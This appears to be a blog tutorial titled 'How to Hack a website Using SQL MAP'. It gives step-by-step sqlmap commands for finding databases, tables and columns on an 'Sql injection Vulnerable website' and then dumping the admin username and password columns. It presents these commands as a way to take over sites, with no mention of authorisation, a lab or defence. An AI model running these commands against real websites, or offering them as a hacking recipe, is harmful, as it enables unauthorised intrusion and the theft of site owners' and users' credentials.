Kali Linux Tutorial - Automated SQLi with SQLMAP

How to Hack a website Using SQL MAP ?

Hello ! This is Vinit with an Interesting Tutorial on SQLMAP. SQLMAP is an automated sql injection take over tool which is used to exploit websites with SQL injection Vulnerability. SQLMAP is already there in backtrack 5 and Kali Linux as Default. What SQLMAP does  is , it exploits the Injection vulnerability in a website and show the attacker the Details and Critical Information about the website. hackers Look for the Admin username and Password from SQL Injection.
So lets start
What we need: 
1. Backtrack or Kali Linux with SQLMAP preinstalled
2. An Sql injection Vulnerable website 
First locate SQLMAP on hardisk

 Then Type :

                     sqlmap -u "target website url here" --dbs

Note : "-u" is For Target URL and "--dbs" is For Databse


 Here We Got two Databases with is show in the above figure

Now type :

        python sqlmap.py -u "target website url here" -D "database to extract" --tables

Note: here -D is for selected database and --tables is for tables to extract

 Here we got tables from Databse we searched for

Now type :

                sqlmap -u "target url" -D " selected Database" -T "selected-Table" --columns

Note :  "-T" is for selected table which is admin and --columns is for columns to extract.

Now type :

   sqlmap  -u "target url" -D " selected Database" -T "selected Table" -C "selected Column" --dump

Note here -C is for selected Column and --dump is for dumping all data in that column

Result of Python sqlmap.py -u "target url" -D " selected Database" -T "selected Table" -C user --dump

Result of  sqlmap -u "target url" -D " selected Database" -T "selected Table" -C password --dump

thanks :)


Post a Comment